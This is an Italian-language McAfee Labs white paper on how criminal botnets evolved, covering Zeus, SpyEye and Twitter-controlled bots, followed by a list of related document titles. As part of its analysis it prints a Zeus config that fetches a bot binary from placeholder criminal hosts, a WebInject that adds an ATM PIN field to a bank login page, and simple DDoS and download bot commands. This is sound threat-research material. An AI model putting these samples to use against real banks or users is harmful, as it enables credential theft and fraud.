La nuova era delle botnet

Dimensione: px
Iniziare la visualizzazioe della pagina:

Download "La nuova era delle botnet"

Transcript

1 Di Zheng Bu, Pedro Bueno, Rahul Kashyap e Adam Wosotowsky McAfee Labs

2 Indice dei contenuti Un settore in sviluppo 3 Evoluzione 4 Bot IRC 4 Bot localizzate 4 Bot P2P 4 Bot HTTP 5 Spy Eye 7 Diffusione globale 8 Suddivisione delle botnet: le principali minacce per nazione 9 Il ruolo dei governi 10 Chi è in pericolo? 11 Uno sguardo al futuro 11 Una nuova era di social zombie? 12 La massima clandestinità 13 Controffensiva: Global Threat Intelligence 14 Fonti 14 McAfee Labs 14 Informazioni su McAfee 14

3 Le reti di robot, pubblicamente note come botnet, hanno una storia diversificata. In buona sostanza, con bot si indica semplicemente una serie di script o comandi o un programma creato per collegarsi a qualcosa (solitamente un server) ed eseguire un comando o una serie di comandi. Fondamentalmente esegue varie funzioni. Non è necessariamente malevola o dannosa. Le bot e i loro utilizzi si sono evoluti da semplici canali o osservatori di giochi (per esempio, le botnet Wisner s Bartender e Lindahl s Game Manager) a fornitori di servizi specializzati come la gestione dei database o la manutenzione di elenchi di accesso. Questo report prende in esame un utilizzo molto diverso: il "raggruppamento" di bot (denominate anche droni o zombie) da parte dei criminali informatici a supporto delle loro attività criminali. Poiché interessano le aziende, queste attività criminali possono includere il furto di segreti commerciali, l'inserimento di malware in file di codice sorgente, l'interruzione dell'accesso o di un servizio, il danneggiamento dell'integrità dei dati e il furto delle informazioni relative all'identità dei dipendenti. Le conseguenze per un'azienda possono essere disastrose e portare a perdita di fatturato e fiducia dei clienti, danneggiamento della reputazione, non raggiungimento della conformità con le normative fino alla chiusura dell'attività stessa. Per gli enti governativi, le preoccupazioni sono ancora più estese. Analizzeremo l'evoluzione delle bot criminali, l'industria che ne supporta la creazione e la distribuzione e come vengono oggi utilizzate da vari gruppi di criminali informatici. Suggeriremo inoltre quale riteniamo sarà il loro futuro nel breve periodo. Un settore in sviluppo Il settore delle botnet ha registrato una sorta di "curva di crescita" (sebbene non in senso positivo). Nei primi anni del secolo bot e botnet venivano create da programmatori con una buona conoscenza di networking e protocolli come Internet Relay Chat (IRC). L'utilizzo del protocollo IRC diede avvio al fenomeno del comando e controllo centralizzati, spesso noto anche come C&C. SDBot, una delle prime e più note bot, era codificato in linguaggio C++. (SDBot era molto diffuso perché il suo autore aveva pubblicato il codice sorgente, una pratica non comune.) Versioni più recenti di SDBot, note anche come SpyBot, iniziarono a sfruttare vulnerabilità Microsoft di chiamate di procedura remota; perciò i suoi programmatori avevano bisogno di competenze nella codifica di exploit per creare tali bot. In questo periodo bot e botnet fiorivano sfruttando varie vulnerabilità ampiamente disponibili nelle più comuni piattaforme Microsoft Windows. Le bot che emersero più tardi nel decennio passato presentavano ulteriori funzionalità per lanciare attacchi denial-of-service (DoS), scansione delle porte e keylogging, tra gli altri. Gli autori di questi malware richiedevano competenze nei linguaggi assemblatori nonché una solida formazione in ambito networking. RBot (2003) è stato tra i primi a utilizzare schemi/packer di compressione e cifratura come UPX, Morphine e ASPack. Tali richieste introdussero un nuovo livello di programmatori informatici specializzati che comprendessero schemi di cifratura, crittografia e come utilizzare tecniche evasive creando i loro codici binari. A questo punto, non si poteva guardare indietro. Il successo di RBot spianò la strada per una più ampia diffusione di crifratura e offuscamento in bot e botnet. Uno dei principali sviluppi nel controllo delle botnet è stato l'utilizzo delle reti peer-to-peer (P2P) per le comunicazioni da parte di Sinit (2003) e Phatbot (2004), che ha completamente modificato l'equazione delle comunicazioni delle botnet. Una delle botnet più sofisticate basate su P2P emersa in seguito è stata Worm/Nuwar (2007), che utilizzava un'architettura P2P decentralizzata e si è dimostrata, per una volta, molto difficile da contrastare. L'esigenza di sofisticazione nella tecnologia delle botnet è guidata dalle varie soluzioni di sicurezza presenti sul mercato per combattere tali problemi. Inoltre, la sofisticazione stessa di bot e botnet spinge l'evoluzione delle tecnologie di sicurezza, creando una relazione molto complessa tra misure e contromisure tra gli autori di malware e i fornitori di soluzioni di sicurezza. Chiaramente, bot e botnet sono diventate sempre più complesse. I programmatori di questo malware devono possedere un livello avanzato di conoscenza di reti, sistemi e crittografia. Dati i volumi e il livello di complessità elevati delle botnet, è molto probabile che siano creati non da un piccolo gruppo di persone ma da un insieme di individui fortemente motivati dal ritorno economico delle loro imprese. La motivazione è ovvia: sabotare e compromettere le aziende e rubare dati che hanno un valore monetario. 3

4 Evoluzione Bot IRC Le prime bot non erano sempre dannose. Ma oggi è molto meno comune, specialmente negli ultimi sei anni, a partire dall'esplosione delle botnet nel 2004 circa. Prima di allora, la maggior parte delle bot utilizzava IRC come protocollo per il controllo. Il protocollo IRC è stato utilizzato all'inizio per collegarsi alle chat room, che permettevano alle persone di scambiarsi messaggi, ed erano molto comuni anni fa. Tuttavia, con l'avvento dei protocolli di messaggistica istantanea come ICQ, AIM e MSN Messenger, il protocollo IRC è diventato meno diffuso, ma viene ancora utilizzato da molti professionisti di networking e sicurezza della "vecchia scuola". Le prime bot venivano create per collegarsi a queste chat room (spesso denominate canali), assicurare che il canale rimanesse aperto, riconoscere gli operatori del canale e dare loro il controllo del canale stesso. L'impostazione più comune era quella di creare bot che potessero analizzare una rete e violare le macchine che contenevano nuove o vecchie vulnerabilità. Una volta compromessa una macchina, la bot si sarebbe collegata a una chat room (canale) specifica per ricevere istruzioni dal gestore della bot, come avviare un attacco DoS contro un sito web. Ancora oggi osserviamo tale comportamento nel recente attacco W32/Vulcanbot contro siti web di attivisti per i diritti umani. Altre funzioni IRC comuni sono quelle di prendere videate del sistema, scaricare o far crescere una bot, e così via. Alcune bot possono eseguire oltre 100 comandi. Abbiamo registrato un gran numero di nuove bot nel 2004, a causa del rilascio di varie applicazioni GUI che consentivano agli hacker di creare bot con un semplice clic. Tale facilità ha rappresentato un enorme passo avanti per i criminali informatici e gli autori di malware: oggi coloro che non sapevano come sviluppare programmi e avevano scarse conoscenze di protocolli di networking e sistemi operativi potrebbero creare un'ampia gamma di bot con un semplice clic del mouse. Bot localizzate Le bot funzionano quasi esclusivamente sulle varie versioni di Windows, ma sono emerse anche versioni localizzate. Utilizzando il linguaggio di script Perl, gli hacker hanno creato versioni che funzionano su vari tipi di sistemi operativi Unix e Linux. L'autore di tali versioni è il gruppo di hacker brasiliani Atrix- Team, al tempo solo un gruppo di giovani "smanettoni". Dato il loro formato "aperto", ancora oggi vediamo circolare queste versioni. Bot P2P Le botnet IRC della vecchia scuola sono ancora diffuse, ma hanno un punto debole: il server IRC. Una volta chiuso il server, l'hacker perde il controllo dell'esercito di bot. Nel 2007 è nato un nuovo tipo di botnet che utilizza il protocollo P2P. Si tratta dello stesso protocollo che molti programmi utilizzano per scaricare musica, per esempio. Una di queste botnet utilizzava un'implementazione cifrata basata sul protocollo edonkey. Questo malware è diventato molto famoso: veniva originariamente denominato W32/Nuwar ma è poi salito alla ribalta con il nome di worm. incorporava circa 100 peer preimpostati come valori hash, che il malware decodifica e utilizza per controllare i nuovi file da scaricare. Tutte le transazioni sono cifrate, così solo il malware stesso può decodificare e agire in base alla risposta. Le risposte generalmente portano a URL che scaricano altro codice binario. è stato responsabile della maggior parte dello spam durante gli anni finché non è stato bloccato. Il vantaggio di un approccio P2P risiede nella sua struttura di controllo distribuita e flessibile, che la rende più difficile da bloccare rispetto ad una botnet di tipo IRC. Tuttavia, questa tipologia è più difficile da mantenere e diffondere data la sua complessità. Alla fine di aprile, abbiamo osservato un altro malware che condivideva parte dello stesso codice - responsabile di spam e attacchi DoS - di. 4

5 Bot HTTP Due o tre anni fa, abbiamo assistito a un cambiamento nel controllo di molte botnet da canali IRC a siti web, utilizzando il protocollo HTTP. Questo passaggio a un protocollo comune si è rivelato una mossa intelligente da parte dei criminali informatici e degli autori di malware. L'evoluzione del protocollo HTTP ha avuto inizio con i progressi nei "kit di exploit". Tali kit, sviluppati principalmente da criminali informatici russi, includevano Mpack, ICEPack e Fiesta. Possono installare software su macchine remote e quindi controllarle da un sito web remoto. I criminali informatici inviano spam o un instant message con vari link alle vittime potenziali. Questi link conducono a siti web con installato il kit di exploit. Il kit quindi stabilisce quale exploit utilizzare in base alla nazione, alla versione del sistema operativo e del browser e anche alle versioni delle applicazioni client installate sulla macchina della vittima. Tutto ciò avviene in modo dinamico e a insaputa della vittima. Se l'exploit ha successo, può successivamente installare un insieme di malware per ottenere il controllo remoto della macchina infetta. Di tutte le botnet HTTP attuali un caso molto particolare è rappresentato da Zeus (nota anche come Zbot), specializzata nel furto di credenziali bancarie. Zeus include sia elementi client sia server. Il server include un builder che aiuta il gestore della bot a creare una variante per il client del malware PWS ZBot (il suo identificativo tecnico), che poi infetterà una macchina, portandola ad unirsi alla botnet collegandosi a un sito web remoto che ospita il server Zeus. Zeus segue un trend interessante: consentire a chiunque di creare in modo semplice una versione personalizzata del malware. Il toolkit di Zeus è piuttosto costoso da acquistare, ma il suo autore ha adottato una serie di misure per assicurarsi che lo strumento sia semplice da utilizzare, il che lo rende anche semplice da vendere ad altre persone, incrementando così anche i profitti del suo creatore. Il seguente esempio mostra Zeus Builder per la versione 1.2.x: Il pannello di sinistra mostra solo due opzioni: Information e Builder. Selezionando Information si scopre se la macchina è infettata con Zeus. Selezionando Builder, la persona che controlla il toolkit riceve aiuto per creare una nuova bot. Il kit utilizza due file di input: Config e WebInjects. Sebbene il Builder disponga di un tasto per modificare il file Config, il tasto è solo uno shortcut. Utilizziamo Notepad per modificare il file. Il file Config include i parametri che saranno seguiti dalla bot. 5

6 Esempi di Config: url_config "http://www.[indirizzo-ip-dei-criminali].cn/cp/config.bin" url_compip "http://www.[indirizzo-ip-dei-criminali].com/" 2048 encryption_key " " ;blacklist_languages 1049 end entry "DynamicConfig" url_loader "http://www.[altro-indirizzo-ip-di-criminale].cn/cp/bot.exe" Questo estratto di Config indica alla bot dove dovrebbe andare per scaricare il file di configurazione e la bot stessa. Questi passaggi assicurano che gli hacker che gestiscono le bot possano aggiornare le loro bot e configurazioni con nuove funzioni e nuovi obiettivi in qualunque momento. Inoltre consentono ai responsabili delle bot di distribuire il file di configurazione e il codice binario delle bot a server diversi, creando così flessibilità con un'architettura distribuita. Il secondo file per creare la bot è WebInject. Questo file specifica gli obiettivi, le vittime da cui l'autore di malware o il proprietario del toolkit vuole ottenere informazioni. Zeus è in grado non solo di impossessarsi di informazioni dalla pagina del web originale, ma anche di inserire campi aggiuntivi. In questo modo può impossessarsi di un numero maggiore di informazioni se il proprietario del toolkit lo desidera. Un esempio di WebInject: set_url https://www.[grande-banca-vittima].com/* G data_before <span class="mozcloak"><input type="password"*/></span> data_end data_inject <br><strong><label for="atmpin">atm PIN</label>:</strong> <br /> <span class="mozcloak"><input type="password" accesskey="a" id="atmpin" name="uspass" size="13" maxlength="14" style="width:147px" tabindex="2" /></span> data_end data_after data_end Questo codice sottrarrà le informazioni sull'url, che in questo caso è una banca. Oltre a rubare nome utente e password, Zeus inserirà un altro campo per il numero PIN del Bancomat. 6

7 Come tendono a fare i malware che hanno successo, Zeus ha generato varie versioni "piratate" del Builder. Alcuni includono addirittura i propri backdoor. Come è possibile? Una versione piratata è apparsa nella seguente videata: Questa versione, denominata MultiBuilder, ha creato due varianti sulla base di Zeus Version 1.3. Abbiamo di recente assistito al passaggio di Zeus dalla Versione 1.3 alla 2.0, che oggi include un modello di licenza molto rigoroso. Zeus è in realtà collegato alla macchina fisica dell'acquirente utilizzando una licenza software commerciale! Il canale di creazione e distribuzione di questo malware mostra un forte senso degli affari. Spy Eye Spy Eye è un altro esempio di bot HTTP complessa. Mostra varie similitudini con Zeus, principalmente che si tratta di un form grabber e che vanta un'architettura di controllo davvero impressionante. Come Zeus, Spy Eye dispone del proprio builder grafico: 7

8 Una funzione interessante di Spy Eye è la sua capacità di rimuovere Zeus dalla macchina che infetta, creando un conflitto interessante all'interno del mondo degli autori di malware. Non è la prima volta che assistiamo ad una lotta tra autori di malware. Per evitare di essere analizzati dai loro obiettivi, sia Zeus che Spy Eye offrono l'opzione di utilizzare una chiave di cifratura durante il processo di creazione della bot. Nelle prime versioni di Zeus questa chiave era preimpostata e incorporata, il che offre alle forze di sicurezza un modo molto più rapido per analizzare ed individuare gli obiettivi del malware. Con questa nuova funzione, i malintenzionati hanno sicuramente innalzato il livello del gioco. Diffusione globale Distribuzione complessiva delle botnet per nazione India Brasile Russia Germania Stati Uniti Gran Bretagna Colombia Indonesia Italia Spagna Argentina Polonia Pakistan Portogallo Vietnam Corea del sud Grecia Cina Bielorussia Australia Altri Figura1: McAfee Labs ha rilevato più infezioni botnet - quasi 1,5 milioni - in India che in qualsiasi altra nazione. Anche Brasile, Russia e Germania hanno superato il milione di infezioni rilevate. 8

9 White paper Suddivisione delle botnet : le principali minacce per nazione Argentina Cina Gran Bretagna Australia Bielorussia Brasile Colombia Corea del sud Germania Grecia India Indonesia

10 Italia Pakistan Polonia Portogallo Russia 2 Spagna 2 Stati Uniti 2 Vietnam 2 Figura 2: Le principali botnet, per nazione. è di gran lunga la botnet più diffusa al mondo. Il ruolo dei governi Poiché la minaccia di una guerra informatica e dei danni che potrebbe causare aumenta, probabilmente vedremo le botnet utilizzate come armi in conflitti futuri. Anzi, potrebbero essere già state utilizzate. Nel nostro mondo sempre più tecnologico l'importanza di comunicazioni efficaci nella gestione di qualsiasi crisi è fondamentale. L'organizzazione di risorse e il loro utilizzo per contrastare eventi naturali o artificiali dipende in larga misura da Internet, uno strumento essenziale per divulgare informazioni ad una serie di parti interessate e coordinare le loro risposte. Influire negativamente o interrompere tale flusso informativo potrebbero addirittura peggiorare un evento. Internet potrebbe diventare un altro teatro di guerra. Eventi come la recente marea nera nel Golfo del Messico, i bombardamenti in Europa e in Iraq, o le schermaglie navali tra i coreani possono essere colpiti da interruzioni mirate di nuovi punti o gruppi di risposta d'emergenza, che dipendono da Internet. Le botnet possono essere acquistate o affittate al mercato nero, e i loro proprietari possono forzatamente assumerne il controllo e reindirizzarle per nuovi obiettivi. Sappiamo che ciò accade regolarmente, perciò sarebbe da sciocchi non aspettarsi che organizzazioni governative o stati nazione in tutto il mondo siano coinvolti nell'acquisizione di funzionalità botnet per esigenze offensive e controffensive. Un'entità civica o nazionale ha dei buoni motivi per acquisire una botnet dai suoi attuali proprietari. Le botnet si infiltrano in aziende, singoli e uffici governativi oltre che in workstation militari. È una questione della massima importanza che i diritti intellettuali e di privacy di cittadini e istituzioni in tutto il mondo siano protetti da coloro che li utilizzerebbero illegalmente. Per assumere il controllo di una botnet il nuovo responsabile sarà costretto a scegliere una strategia: chiudere il sistema, il che potrebbe 10

11 potenzialmente danneggiare le macchine che sono parte della botnet, causare seri danni all'infrastruttura ed eventualmente rendere il nuovo proprietario responsabile per il danno; disattivare la botnet finché tutti i nodi infetti vengono modernizzati e non sono più sotto controllo; oppure monitorare la botnet per identificare e catturare il gestore della bot. Ciascuno di questi passaggi è controverso. Chi è in pericolo? Tutti gli utenti di computer sono in pericolo perché tutti navighiamo sulla stessa rete Internet. Ci sono solo una manciata di modi con cui i criminali informatici possono infettare un sistema o una rete con le loro bot (o qualsiasi forma di software dannoso). Questi modi prevedono una qualche forma di social engineering, che può essere definita come una violazione del cervello umano. Gli aggressori utilizzano uno strategemma o un'esca per ingannare gli utenti di computer e spingerli o a fare clic su un link o a installare un programma che non utilizzerebbero altrimenti. Una delle tecniche più intelligenti e diffuse oggi per i criminali informatici è quella di utilizzare eventi di cronaca di alto profilo per attirare vittime inconsapevoli. I criminali informatici leggono le stesse notizie di cronaca e sanno che molte persone consultano le notizie online. Che si tratti di un link che finge di essere un video di un disastro attuale o un dramma che interessa celebrità famose, tali stratagemmi attirano utenti come il miele con gli orsi. Tali aggressori potrebbero insegnare qualche trucco ai responsabili marketing con la loro conoscenza del comportamento umano e che cosa gli utenti ricercano online. Dobbiamo rimanere consapevoli dei rischi che corriamo navigando e utilizzando le tecnologie Web 2.0 dal momento che i criminali informatici utilizzeranno le notizie per colpirci. Ciascuno di noi dovrebbe essere sospettoso nei confronti degli attacchi di social networking, ma aziende e governi subiscono i maggiori danni dagli attacchi di botnet. Alcune delle minacce per le aziende includono: Click fraud: visitando pagine web e tramite clic automatico su banner pubblicitari per sottrarre grandi somme di denaro da società pubblicitarie online Attacchi DoS distribuiti: saturazione della larghezza di banda per bloccare il traffico legittimo. Questi attacchi sono più spesso condotti da aziende concorrenti, clienti insoddisfatti o per motivi politici. Infiltrazione in file system: accesso a sistemi critici per rubare dati dei clienti, informazioni sulla privacy dei dipendenti, segreti commerciali, informazioni finanziarie aziendali, ecc. Disabilitazione della sicurezza esistente: prevenzione delle attività di bonifica o dirottamento da parte di proprietari di bot rivali Spam: utilizzo di risorse e larghezza di banda di altri sistemi per inviare grandi quantità di spam Infezioni del codice sorgente: avvelenamento dell'intero albero del codice sorgente inserendo modifiche non autorizzate e impercettibili o individuazione di ulteriori vulnerabilità da sfruttare Le conseguenze di tali attacchi possono essere piuttosto gravi, con costi significativi per le aziende in termini di manodopera e tempo per le attività di bonifica. Inoltre, le aziende potrebbero vedere annullati i loro mandati di conformità con le normative o di settore. Sono inoltre probabili responsabilità legali da parte di clienti, dipendenti o altri che abbiano subito danni per colpa di misure di sicurezza inadeguate da parte dell'azienda. Per i governi e i proprietari di infrastrutture critiche, i danni causati dalle botnet possono essere anche più estesi: Gli attacchi DoS possono interrompere le comunicazioni durante una crisi. Le infezioni al codice sorgente possono provocare la chiusura di reti critiche. I sistemi ad accesso ristretto possono fornire al nemico informazioni militari. Uno sguardo al futuro Negli ultimi sei anni, le botnet sono diventate una delle maggiori minacce non solo per i professionisti della sicurezza informatica ma anche per le aziende e i consumatori, praticamente chiunque possegga un computer. Le botnet rappresentano l'infrastruttura più essenziale utilizzata da criminali informatici e governi per lanciare praticamente ogni tipo di attacco: dallo spionaggio e fuoriuscita di dati allo spam agli attacchi DDoS. McAfee Labs ha già osservato un trend importante verso un'infrastruttura di botnet più distribuita e flessibile, che si basa su tecnologie solide come il protocollo P2P, il controllo via web e i servizi Web 2.0, oltre che su tecniche di evasione e fail-over. 11

12 Una nuova era di social zombie? Di pari passo con l'evoluzione dei servizi Web 2.0 aumentano anche le attività degli autori di botnet, man mano che adottano nuove tecnologie per incrementare la complessità dei loro attacchi. KeriosC2, mentre scriviamo questo report, è uno strumento proof-of-concept che dimostra che LinkedIn, Twitter e TinyURL possono essere utilizzati per controllare una botnet. Gli utenti di computer in tutto il mondo si divertono con il social networking; ora lo fanno anche le botnet. E non si tratta di uno sviluppo positivo. Dal momento che le botnet sfruttano applicazioni e protocolli utilizzati comunemente, sarà più difficile che mai rilevare e prevenire le comunicazioni delle botnet. Un ulteriore sviluppo si è verificato a maggio, quando alcune bot hanno iniziato ad utilizzare Twitter per ricevere i comandi. La funzionalità è al momento piuttosto semplice; si limita a monitorare (o seguire) un account Twitter per ricevere i comandi. Come si evince dalla videata seguente, ha un builder GUI molto semplice. A differenza dei più complessi Zeus o Spy Eye, questa forma non include alcuna opzione, semplicemente un campo in cui inserire il nome utente di Twitter, che la bot seguirà per ricevere i comandi. Mentre scriviamo, anche la struttura e la sintassi del comando sono elementari:.visit: per aprire una pagina specifica.download: per scaricare un file da un'ubicazione remota.ddos: per causare un attacco denial of service alla vittima 12

13 La massima clandestinità Gli autori di botnet hanno adottato molti approcci per evitare il rilevamento da parte di software o dispositivi di sicurezza. In termini di processo, gli autori di malware testano comunemente il loro malware con i prodotti dei principali vendor di sicurezza per assicurarsi che non vengano individuati, o quasi. Di conseguenza, criminali informatici e autori di malware spesso pubblicizzano il loro malware come "a prova di rilevamento". Elenchi di controllo degli accessi o l'applicazione di policy basate su IP possono rappresentare un controllo efficace contro le connessioni da parte di una bot verso i suoi server di controllo. Autori di botnet e malware hanno risposto a tale contrattacco implementando algoritmi di flusso invece che utilizzare elenchi IP incorporati per i loro server di comando. Zeus utilizza questa tecnica per generare domini rapidamente. Questo passaggio può sconfiggere in modo efficace i molti meccanismi di rilevamento basati sulle tradizionali blacklist. I malintenzionati hanno sviluppato molte tecniche di evasione per i download drive-by per evitare l'ispezione da parte di dispositivi di sicurezza di rete. Un buon esempio è la manipolazione dell'estensione dei file dimostrata dal builder Gh0st RAT. (Consultare la videata seguente.) Operazione Aurora e altre nuove minacce malware hanno utilizzato trucchi simili. Osserviamo molti altri tipi di evasioni - dalla semplice codifica alla cifratura (anche effettuando lo xoring del codice binario) - nel tentativo da parte degli autori di malware di installare il loro software sulla macchina di una vittima. Nel corso degli ultimi anni molte botnet di grandi dimensioni sono state messe offline. Per evitare che ciò accada e rendere la loro infrastruttura di botnet più solida e flessibile, i responsabili delle bot hanno iniziato ad introdurre nuove tecniche. Abbiamo già osservato le tecniche di flusso per incrementare la flessibilità dei server di controllo. Il protocollo P2P, sebbene costoso da implementare e supportare, è stato utilizzato anche in alcune botnet furtive come e Nugache. I protocolli web, sia cifrati che in chiaro, vengono ampiamente utilizzati in sostituzione dei comandi per il protocollo IRC utilizzato più comunemente, principalmente perché queste porte web sono quasi universalmente abilitate attraverso i firewall, anche in reti aziendali rigorosamente controllate. McAfee Labs prevede che criminali informatici e autori di botnet continueranno a spingersi ai limiti delle tecnologie Web 2.0. Di seguito alcuni altri avanzamenti previsti: Funzionalità ed accesso multibrowser ben oltre Internet Explorer e Firefox Maggiore integrazione incorporata con tecnologie di instant-messaging come JabberZeuS per fornire un rapido accesso ai dati bancari e non solo Ulteriore integrazione con altro malware, come Bredolad e Pushdo, per assicurare una maggior diffusione sui sistemi a livelo globale 13

14 Controffensiva: Global Threat Intelligence Poiché le minacce informatiche sono cresciute in modo esponenziale diventando anche sempre più complesse, i professionisti della sicurezza richiedono un approccio diverso per rilevare e contrastare gli attacchi. In passato, una strategia di difesa approfondita - una stratificazione di tecnologie simili - era sufficiente. L'approccio odierno, tuttavia, deve sfruttare le informazioni correlate sulle minacce provenienti da tutto il mondo e per tutti i vettori delle minacce. Tali informazioni di intelligence devono essere poi incorporate in un'ampia gamma di prodotti di sicurezza per consentirgli di applicare policy locali sulla base della più recente attività delle minacce e per condividere informazioni in modo che l'infrastruttura di sicurezza complessiva operi in modo armonico. McAfee sta scrivendo il capitolo successivo per quanto riguarda la sicurezza approfondita con Global Threat Intelligence, il nostro motore nel cloud che raccoglie e correla i dati sulle minacce provenienti da tutti i vettori delle minacce, crea un modello di minaccia completo e offre protezione al mercato tramite una suite completa di prodotti di sicurezza. La nostra funzionalità cloud opera di concerto con i motori locali dei prodotti McAfee e i meccanismi di enforcement basati sulle policy per fornire la protezione contro le minacce più solida e completa disponibile sul mercato. I nostri clienti beneficiano dall'utilizzo di prodotti di sicurezza McAfee che non solo condividono le informazioni di intelligence, ma lo fanno in modo significativo e contestuale al loro ruolo e a dove risiedono sulla rete. Fonti "Progress Made, Trends Observed" (I progressi fatti, i trend rilevati), Microsoft Antimalware Team. -%20progress%20made%20lessons%20learned.pdf SecureWorks. White paper tecnici McAfee Labs. McAfee Labs McAfee Labs è il gruppo di ricerca mondiale di McAfee, Inc. Con l'unica organizzazione di ricerca focalizzata su tutti i vettori di minaccia, ovvero malware, web, , rete e vulnerabilità, McAfee Labs è in grado di sfruttare l'intelligence di milioni di sensori e tecnologie di reputazione "in the cloud", quali McAfee Artemis e McAfee TrustedSource. I 350 ricercatori pluridisciplinari di McAfee Labs in 30 nazioni seguono la gamma completa di minacce in tempo reale, identificando le vulnerabilità delle applicazioni, analizzando e correlando i rischi e attivando rimedi immediati per proteggere aziende e consumatori. Informazioni su McAfee Con sede principale a Santa Clara, California, McAfee Inc. è la principale azienda focalizzata sulle tecnologie di sicurezza. McAfee è costantemente impegnata ad affrontare le più difficili sfide legate alla sicurezza. L'azienda offre prodotti e servizi di sicurezza riconosciuti e proattivi che proteggono sistemi e reti in tutto il mondo, consentendo agli utenti di collegarsi a Internet, navigare ed effettuare acquisti sul web in modo sicuro. Supportata da un pluripremiato team di ricerca, McAfee crea prodotti innovativi destinati a utenti consumer, aziende, pubblica amministrazione e service provider che necessitano di conformarsi alle normative, proteggere i dati, prevenire le interruzioni dell'attività, individuare le vulnerabilità e monitorare e migliorare costantemente la propria sicurezza. Le informazioni contenute nel presente documento sono fornite solo a scopo istruttivo e a vantaggio dei clienti di McAfee. Le informazioni contenute nel presente documento sono soggette a modifica senza preavviso e vengono fornite "così come sono" senza alcuna garanzia relativamente alla loro precisione o applicabilità a qualunque situazione o circostanza specifica. McAfee Srl via Fantoli, Milano Italia (+39) McAfee e il logo McAfee sono marchi registrati o marchi di McAfee, Inc. o sue filiali negli Stati Uniti e altre nazioni. Gli altri marchi e le altre marche possono essere di proprietà di terzi. I piani, le specifiche e le descrizioni dei prodotti sono qui forniti a puro scopo informativo e sono soggetti a variazioni senza preavviso, e vengono forniti senza alcun tipo di garanzia, esplicita o implicita wp_botnets_0710_ETMG

KASPERSKY FRAUD PREVENTION FOR ENDPOINTS

KASPERSKY FRAUD PREVENTION FOR ENDPOINTS KASPERSKY FRAUD PREVENTION FOR ENDPOINTS www.kaspersky.com KASPERSKY FRAUD PREVENTION 1. Modi di attacco ai servizi bancari online Il motivo principale alla base del cybercrimine è quello di ottenere denaro

Dettagli

Implicazioni sociali dell informatica

Implicazioni sociali dell informatica Fluency Implicazioni sociali dell informatica Capitolo 10 Privacy I nostri corpi I nostri luoghi Le informazioni Le comunicazioni personali La privacy Con i moderni dispositivi è possibile violare la privacy

Dettagli

Recente aumento della diffusione di virus Malware

Recente aumento della diffusione di virus Malware Recente aumento della diffusione di virus Malware Recentemente è stato registrato un aumento della diffusione di particolari tipi di virus chiamati generalmente Malware che hanno come scopo principale

Dettagli

Malware Definizione e funzione

Malware Definizione e funzione Malware Definizione e funzione Cos è un Malware Il termine Malware è l'abbreviazione di "malicious software", software dannoso. Malware è un qualsiasi tipo di software indesiderato che viene installato

Dettagli

http://news.drweb.com/?i=3374&c=5&lng=ru&p=0 Doctor Web: rassegna delle attività di virus a febbraio 2013 12 marzo 2013

http://news.drweb.com/?i=3374&c=5&lng=ru&p=0 Doctor Web: rassegna delle attività di virus a febbraio 2013 12 marzo 2013 http://news.drweb.com/?i=3374&c=5&lng=ru&p=0 Doctor Web: rassegna delle attività di virus a febbraio 2013 12 marzo 2013 A febbraio 2013, gli incidenti informatici più noti sono stati la diffusione su vasta

Dettagli

DIFENDERSI DAI MODERNI ATTACCHI DI PHISHING MIRATI

DIFENDERSI DAI MODERNI ATTACCHI DI PHISHING MIRATI DIFENDERSI DAI MODERNI ATTACCHI DI PHISHING MIRATI DIFENDERSI DAI MODERNI ATTACCHI DI PHISHING MIRATI 2 Introduzione Questa email è una truffa o è legittima? È ciò che si chiedono con sempre maggiore frequenza

Dettagli

Internet Security Threat Report Volume X

Internet Security Threat Report Volume X Internet Security Threat Report Volume X Il 28 gennaio 2002 è stato pubblicato il primo volume dell Internet Security Threat Report da Riptech, società di Managed Security Services acquisita da Symantec

Dettagli

Informazioni sul Global Internet Security Threat Report di Symantec

Informazioni sul Global Internet Security Threat Report di Symantec Informazioni sul Global Internet Security Threat Report di Symantec Il Global Internet Security Threat Report di Symantec fornisce una panoramica e un analisi delle attività delle minacce di Internet a

Dettagli

Fonte: http://news.drweb.com/?i=3432&c=5&lng=ru&p=1

Fonte: http://news.drweb.com/?i=3432&c=5&lng=ru&p=1 Fonte: http://news.drweb.com/?i=3432&c=5&lng=ru&p=1 Resoconto di marzo: trojan Hosts e ArchiveLock 2 aprile 2013 Analizzando la situazione a marzo, il team di Doctor Web rileva una chiara tendenza: la

Dettagli

Riciclaggio digitale. Documento di sintesi. Analisi delle valute online e del loro uso nel cybercrime

Riciclaggio digitale. Documento di sintesi. Analisi delle valute online e del loro uso nel cybercrime Documento di sintesi Riciclaggio digitale Analisi delle valute online e del loro uso nel cybercrime Di Raj Samani, EMEA, McAfee François Paget e Matthew Hart, McAfee Labs Alcune recenti iniziative delle

Dettagli

Botnet e APT, una minaccia crescente per i Service Provider

Botnet e APT, una minaccia crescente per i Service Provider Botnet e APT, una minaccia crescente per i Service Provider Page 1 of 7 - Confidenziale Indice 1. Il Contesto Attuale: APT e Minacce Evolute... 3 2. Inefficacia degli attuali sistemi di sicurezza... 3

Dettagli

Protezione unificata e intelligence contro le minacce avanzate e il furto di dati

Protezione unificata e intelligence contro le minacce avanzate e il furto di dati TRITON APX Protezione unificata e intelligence contro le minacce avanzate e il furto di dati La tua organizzazione deve affrontare un numero sempre maggiore di minacce avanzate che possono condurre a furti

Dettagli

La sicurezza informatica. Luca Filippi Luca.Filippi@seclab.it

La sicurezza informatica. Luca Filippi Luca.Filippi@seclab.it La sicurezza informatica Luca Filippi Luca.Filippi@seclab.it Che cos è SecLab 04/04/2015 http://www.seclab.it 2 Che cos è la sicurezza informatica Le informazioni vanno protette contro chi vuole appropriarsene

Dettagli

Difenditi dai Malware

Difenditi dai Malware con la collaborazione di Difenditi dai Malware Pensi che il PHISHING sia solo un tipo di pesca? Pensi che i COOKIE siano solo biscotti? Pensi che un VIRUS sia solo un raffreddore? Difenditi dai Malware

Dettagli

Connessioni sicure: ma quanto lo sono?

Connessioni sicure: ma quanto lo sono? Connessioni sicure: ma quanto lo sono? Vitaly Denisov Contenuti Cosa sono le connessioni sicure?...2 Diversi tipi di protezione contro i pericoli del network.....4 Il pericolo delle connessioni sicure

Dettagli

Symantec Insight e SONAR

Symantec Insight e SONAR Teniamo traccia di oltre 3, miliardi di file eseguibili Raccogliamo intelligence da oltre 20 milioni di computer Garantiamo scansioni del 70% più veloci Cosa sono Symantec Insight e SONAR Symantec Insight

Dettagli

Questo grafico mostra com è aumentato il numero di record per i programmi malevoli per SO Android nel database dei virus Dr.Web

